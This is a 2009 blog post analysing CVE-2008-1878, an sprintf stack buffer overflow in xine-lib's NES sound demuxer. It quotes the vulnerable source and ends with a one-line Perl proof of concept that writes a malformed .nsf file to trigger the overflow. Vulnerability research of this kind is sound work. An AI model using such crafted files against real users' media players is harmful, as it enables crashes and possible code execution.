xorl %eax, %eax

CVE-2008-1878: xine-lib NES Sound Format Demuxer Buffer Overflow

leave a comment »

Now, I’m listening to Godsmack – Re-Align and decided to post some more notes for a straightforward vulnerability on xine-lib up to 1.1.12. Yeah, the bug was at NES (Nintendo Entertainment System) sound demuxer. As you can see at: src/demuxers/demux_nsf.c the interesting stuff happen at:

   118  static int demux_nsf_send_chunk(demux_plugin_t *this_gen) {
   119    demux_nsf_t *this = (demux_nsf_t *) this_gen;
   120    buf_element_t *buf;
   121    int bytes_read;
   122    char title[100];
                ...
   158     if (this->new_song) {
   159
   160       buf->decoder_info[1] = this->current_song;
   161       this->new_song = 0;
   162       sprintf(title, "%s, song %d/%d",
   163         this->title, this->current_song, this->total_songs);
   164

Yeap, now it’s time to laugh like crazy… an sprintf overflow!! To create a malicious .nsf file you have to understand the structure of the NES file format header. Here is its check during the opening of the file (open_nsf_file() function):

   100    /* check for the signature */
   101    if ((header[0] != 'N') ||
   102        (header[1] != 'E') ||
   103        (header[2] != 'S') ||
   104        (header[3] != 'M') ||
   105        (header[4] != 0x1A))
   106    return 0;
   107
   108

As you can see in the first code snippet the user controlled title is a stack buffer of 100 bytes size and the header has to be: “NESM” + 0x1A.
So, the header have to be 128 bytes. Yeah, that’s all… Here is a simple proof of concept for this vulnerability as initially demonstrated by Guido Landi:

sh-3.2$ perl -e 'print "NESM" . "\x1A\x01\x01\x01\x80\x80\x18\x8A\x03\x8A" . "X" x 114' > file.nsf
sh-3.2$

Written by xorl

January 1, 2009 at 14:33

Posted in bugs

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s